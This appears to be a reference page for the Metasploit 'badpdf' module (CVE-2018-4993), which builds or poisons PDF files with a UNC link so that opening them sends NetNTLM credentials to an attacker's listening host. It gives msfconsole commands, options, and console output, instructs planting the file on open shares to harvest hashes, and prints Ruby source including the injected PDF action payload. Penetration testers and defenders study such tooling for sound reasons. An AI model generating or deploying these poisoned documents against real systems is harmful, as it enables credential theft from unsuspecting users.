BADPDF Malicious PDF Creator - Metasploit
This page contains detailed information about how to use the auxiliary/fileformat/badpdf metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
Source code: modules/auxiliary/fileformat/badpdf.rb
Disclosure date: -
Last modification time: 2019-01-09 14:30:24 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-4993
This module can either creates a blank PDF file which contains a UNC link which can be used to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary code into an existing PDF document if possible.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/fileformat/badpdf
msf auxiliary(badpdf) > show targets
... a list of targets ...
msf auxiliary(badpdf) > set TARGET target-id
msf auxiliary(badpdf) > show options
... show and set options ...
msf auxiliary(badpdf) > exploit
Required Options
- LHOST: Host listening for incoming SMB/WebDAV traffic
Knowledge Base
This module will either create a blank pdf document which contains a UNC link which will connect back to LHOST if file FILENAME options is used or if PDFINJECT option is used will try and inject the necessary UNC code into an existing PDF document.
Vulnerable Application
Various PDF Readers. Note Adobe released the patch APSB18-09 to prevent this and FoxIT after version 9.1 is no longer vulnerable.
Verification Steps
- Install the application
- Start msfconsole
- Do:
use auxiliary/fileformat/badpdf
- Customise Options as required
- Do:
run
- A file pointing back to the listening host will then be generated.
- Configure auxiliary/server/capture/smb or similar to capture hashes.
- Upload the document to an open share or similar and wait for hashes.
Options
FILENAME This option allows you to customise the generated filename. This can be changed using set FILENAME test.pdf
LHOST This option allows you to set the IP address of the SMB Listener that the document points to This can be changed using set LHOST 192.168.1.25
PDFINJECT This option allows you to inject the UNC code into an existing PDF document This can be changed using set PDFINJECT /path/to/file/pdf.pdf
Scenarios
Microsoft Windows
Console output
msf auxiliary(fileformat/badpdf) > show info
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Richard Davy - secureyourit.co.uk
CheckPoint researchers - Assaf Baharav, Yaron Fruchtmann, Ido Solomon
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no Filename
LHOST yes Host listening for incoming SMB/WebDAV traffic
PDFINJECT no Path and filename to existing PDF to inject UNC link code into
Description:
This module can either creates a blank PDF file which contains a UNC
link which can be used to capture NetNTLM credentials, or if the
PDFINJECT option is used it will inject the necessary code into an
existing PDF document if possible.
References:
https://cvedetails.com/cve/CVE-2018-4993/
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
msf auxiliary(fileformat/badpdf) >
msf auxiliary(fileformat/badpdf) > set filename test.pdf
filename => test.pdf
msf auxiliary(fileformat/badpdf) > set lhost 192.168.1.28
lhost => 192.168.1.28
msf auxiliary(fileformat/badpdf) > exploit
[+] test.pdf stored at /root/.msf4/local/test.pdf
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) > set filename ""
filename =>
msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf
pdfinject => /root/Desktop/example.pdf
msf auxiliary(fileformat/badpdf) > exploit
[+] Malicious file writen to /root/Desktop/example_malicious.pdf
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) >
Go back to menu.
Msfconsole Usage
Here is how the fileformat/badpdf auxiliary module looks in the msfconsole:
msf6 > use auxiliary/fileformat/badpdf
msf6 auxiliary(fileformat/badpdf) > show info
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Assaf Baharav
Yaron Fruchtmann
Ido Solomon
Richard Davy - secureyourit.co.uk
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no Filename
LHOST yes Host listening for incoming SMB/WebDAV traffic
PDFINJECT no Path and filename to existing PDF to inject UNC link code into
Description:
This module can either creates a blank PDF file which contains a UNC
link which can be used to capture NetNTLM credentials, or if the
PDFINJECT option is used it will inject the necessary code into an
existing PDF document if possible.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-4993
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
Module Options
This is a complete list of options available in the fileformat/badpdf auxiliary module:
msf6 auxiliary(fileformat/badpdf) > show options
Module options (auxiliary/fileformat/badpdf):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no Filename
LHOST yes Host listening for incoming SMB/WebDAV traffic
PDFINJECT no Path and filename to existing PDF to inject UNC link code into
Advanced Options
Here is a complete list of advanced options supported by the fileformat/badpdf auxiliary module:
msf6 auxiliary(fileformat/badpdf) > show advanced
Module advanced options (auxiliary/fileformat/badpdf):
Name Current Setting Required Description
---- --------------- -------- -----------
DisablePayloadHandler true no Disable the handler code for the selected payload
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the fileformat/badpdf module can do:
msf6 auxiliary(fileformat/badpdf) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the fileformat/badpdf auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(fileformat/badpdf) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Please configure either FILENAME or PDFINJECT
Here is a relevant code snippet related to the "Please configure either FILENAME or PDFINJECT" error message:
38: )
39: end
40:
41: def run
42: if datastore['PDFINJECT'].nil? && datastore['FILENAME'].nil?
43: print_error 'Please configure either FILENAME or PDFINJECT'
44: elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
45: injectpdf
46: elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
47: createpdf
48: else
FILENAME or PDFINJECT must end with '.pdf' file extension
Here is a relevant code snippet related to the "FILENAME or PDFINJECT must end with '.pdf' file extension" error message:
44: elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
45: injectpdf
46: elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
47: createpdf
48: else
49: print_error "FILENAME or PDFINJECT must end with '.pdf' file extension"
50: end
51: end
52:
53: def injectpdf
54: # Payload which gets injected
File doesn't exist <PDFINJECT>
Here is a relevant code snippet related to the "File doesn't exist <PDFINJECT>" error message:
55: inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"
56:
57: # if given path doesn't exist display error and return
58: unless File.exist?(datastore['PDFINJECT'])
59: # If file not found display error message
60: print_error "File doesn't exist #{datastore['PDFINJECT']}"
61: return
62: end
63:
64: # Read in contents of file
65: content = File.read(datastore['PDFINJECT'])
Could not find placeholder to poison file this time....
Here is a relevant code snippet related to the "Could not find placeholder to poison file this time...." error message:
74: end
75: end
76:
77: # Display error message if we couldn't poison the file
78: if newdata.empty?
79: print_error 'Could not find placeholder to poison file this time....'
80: return
81: end
82:
83: # Create new filename by replacing .pdf with _malicious.pdf
84: newfilename = "#{datastore['PDFINJECT'].gsub(/\.pdf$/, '')}_malicious.pdf"
Something went wrong creating malicious PDF file
Here is a relevant code snippet related to the "Something went wrong creating malicious PDF file" error message:
86: File.open(newfilename, 'wb') { |file| file.write(newdata) }
87: # Check file exists and display path or error message
88: if File.exist?(newfilename)
89: print_good("Malicious file writen to: #{newfilename}")
90: else
91: print_error 'Something went wrong creating malicious PDF file'
92: end
93: end
94:
95: def createpdf
96: # Code below taken POC provided by CheckPoint Research
Go back to menu.
Related Pull Requests
- #11217 Merged Pull Request: auxiliary/fileformat/badpdf: fix syntax and logic error in options handling
- #10148 Merged Pull Request: Add New Module - Badpdf
- #10157 Merged Pull Request: Multidrop Module Code Improvement
References
See Also
Check also the following modules related to this module:
Authors
- Assaf Baharav
- Yaron Fruchtmann
- Ido Solomon
- Richard Davy - secureyourit.co.uk
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.